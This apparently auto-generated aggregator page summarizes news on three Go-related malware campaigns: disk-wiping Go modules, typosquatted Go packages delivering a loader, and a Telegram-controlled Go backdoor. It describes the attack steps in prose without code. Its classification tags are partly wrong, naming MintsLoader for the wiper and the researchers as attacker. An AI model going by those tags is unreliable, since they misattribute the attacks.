FlagThis - #golang

Cybersecurity researchers have uncovered a sophisticated supply chain attack targeting the Go programming language ecosystem, revealing three malicious Go modules designed to wipe Linux systems. These modules, named github.com/truthfulpharm/prototransform, github.com/blankloggia/go-mcp, and github.com/steelpoor/tlsproxy, contain obfuscated code that fetches next-stage payloads capable of irrevocably overwriting a Linux system's primary disk, rendering it unbootable. The attack, discovered in April 2025, highlights the dangers of direct dependency imports from public repositories and the effectiveness of code obfuscation in evading detection.

The malicious modules are designed to specifically target Linux environments. Upon execution, they retrieve a destructive shell script from a remote server using wget. This script, known as "done.sh," employs the Unix utility 'dd' to overwrite the entire primary disk ("/dev/sda") with zeroes. This process effectively eliminates the file system, operating system, and all user data, leaving affected systems crippled and data unrecoverable. According to Socket researcher Kush Pandya, this destructive method ensures no data recovery tool or forensic process can restore the data, emphasizing the extreme danger posed by modern supply-chain attacks.

This incident underscores the escalating risks present in open-source supply chains and the potential for seemingly trusted code to become devastating threats. The impact of such an attack includes complete data loss, prolonged operational downtime, and severe financial and reputational damage for affected organizations. Security experts recommend thorough dependency audits, the implementation of automated code scanning tools, and continuous monitoring solutions to detect obfuscated or suspicious behaviors in third-party packages as crucial mitigation steps.


References :

• Cyber Security News: Go‑Powered Supply‑Chain Hack Deploys Disk‑Wipers, Erasing Critical Data at Scale
• gbhackers.com: Hackers Weaponize Go Modules to Deliver Disk‑Wiping Malware, Causing Massive Data Loss
• The Hacker News: Malicious Go Modules Deliver Disk-Wiping Linux Malware in Advanced Supply Chain Attack
• gbhackers.com: Hackers Weaponize Go Modules to Deliver Disk‑Wiping Malware, Causing Massive Data Loss
• socket.dev: A single line of obfuscated Go code wiped entire disks clean.
• Talkback Resources: Malicious Go Modules Deliver Disk-Wiping Linux Malware in Advanced Supply Chain Attack [app] [mal]
• socket.dev: wget to Wipeout: Malicious Go Modules Fetch Destructive Payload
• securityaffairs.com: Malicious Go Modules designed to wipe Linux systems
• cyberpress.org: Go‑Powered Supply‑Chain Hack Deploys Disk‑Wipers, Erasing Critical Data at Scale
• Talkback Resources: Malicious Go Modules designed to wipe Linux systems [sys] [mal]
• www.scworld.com: Linux disk-wiping malware spread via Go modules
• BleepingComputer: Linux wiper malware hidden in malicious Go modules on GitHub

Classification:

• HashTags: #supplychainattack #golang #malware
• Target: Linux Systems
• Attacker: MintsLoader Authors
• Product: Go modules
• Feature: Supply Chain
• Malware: MintsLoader
• Type: Malware
• Severity: Disaster

Socket researchers have discovered a malicious campaign infiltrating the Go ecosystem using typosquatted packages. These packages are designed to install hidden loader malware targeting Linux and macOS systems. The threat actor has published at least seven packages that impersonate widely used Go libraries.

These malicious packages share repeated malicious filenames and consistent obfuscation techniques, suggesting a coordinated threat actor. One of the packages appears to target financial-sector developers. The typosquatted packages can execute remote code, potentially stealing data or credentials.


References :

• Information Security Buzz: Typosquatted Go Packages Distribute Malware Loader Targeting Linux and macOS
• Anonymous ???????? :af:: Researchers have found a malicious campaign targeting Go developers with fake libraries. At least 7 typosquatted packages impersonate popular Go modules to deploy loader malware. These can execute remote code, stealing data or credentials on Linux and macOS systems.
• socket.dev: Typosquatted Go Packages Deliver Malware Loader Targeting Linux and macOS Systems
• The Hacker News: Seven Malicious Go Packages Found Deploying Malware on Linux and macOS Systems

Classification:

• HashTags: #Typosquatting #Golang #Malware
• Company: Go
• Target: Go developers
• Attacker: Typosquatters
• Product: Go Packages
• Feature: Typosquatting
• Malware: Hypert
• Type: Malware
• Severity: High

A new Golang-based backdoor has been discovered that leverages the Telegram Bot API for command-and-control (C2) communications. Cybersecurity researchers at Netskope Threat Labs detailed the malware, suggesting it may be of Russian origin. According to security researcher Leandro Fróes, the malware, while seemingly still under development, is fully functional and acts as a backdoor once executed. The backdoor utilizes an open-source library offering Golang bindings for the Telegram Bot API.

Once launched, the malware checks if it’s running under a specific location and name ("C:\Windows\Temp\svchost.exe"). If not, it copies itself to that location and creates a new process. The backdoor interacts with the Telegram Bot API to receive commands from an attacker-controlled chat, supporting commands to execute PowerShell commands, relaunch itself, and self-destruct. Though not fully fleshed out, a screenshot command is also present.

Netskope highlights the use of cloud applications like Telegram presents a challenge for defenders, as attackers exploit the ease of use and setup these apps provide during various attack phases. The use of the Russian language in the "/cmd" instruction, which sends the message "Enter the command:" in Russian, further supports the assessment of potential Russian origin. This malware uses Telegram for C2, and has the capability of executing PowerShell commands and self-destructing to evade detection.


References :

• ciso2ciso.com: New Golang-Based Backdoor Uses Telegram Bot API for Evasive C2 Operations – Source:thehackernews.com
• securityaffairs.com: New Golang-based backdoor relies on Telegram for C2 communication
• Talkback Resources: New Golang-Based Backdoor Uses Telegram Bot API for Evasive C2 Operations [mal]
• The Hacker News: New Golang-Based Backdoor Uses Telegram Bot API for Evasive C2 Operations
• ciso2ciso.com: New Golang-Based Backdoor Uses Telegram Bot API for Evasive C2 Operations – Source:thehackernews.com
• hackread.com: Hackers Exploit Telegram API to Spread New Golang Backdoor with Russian Connection
• Talkback Resources: New Golang-Based Backdoor Uses Telegram Bot API for Evasive C2 Operations
• securityonline.info: A new Golang-based backdoor, potentially of Russian origin, uses Telegram for C2 communication, exploiting cloud apps for enhanced stealth.
• Talkback Resources: Talkback.sh article summarizing a new Golang-based backdoor using Telegram Bot API for evasive C2 operations.
• www.scworld.com: Telegram API exploited by new Golang backdoor
• Security Risk Advisors: New #Golang backdoor abuses #Telegram Bot API for stealthy remote commands and self-destruct. The post appeared first on .
• securityonline.info: Security researchers at Netskope Threat Labs have uncovered a new backdoor malware written in Golang that leverages Telegram The post appeared first on .
• Threat Labs - Netskope: 🚩Golang Malware Uses Telegram Bot API for Stealthy Remote Commands and Data Exfiltration
• www.csoonline.com: Russian malware discovered with Telegram hacks for C2 operations

Classification:

• HashTags: #Malware #Telegram #CyberSecurity
• Company: Telegram
• Target: Systems Using Telegram API
• Attacker: Netskope Threat Labs
• Product: Telegram Bot API
• Feature: command-and-control
• Malware: Golang Backdoor
• Type: Malware
• Severity: Major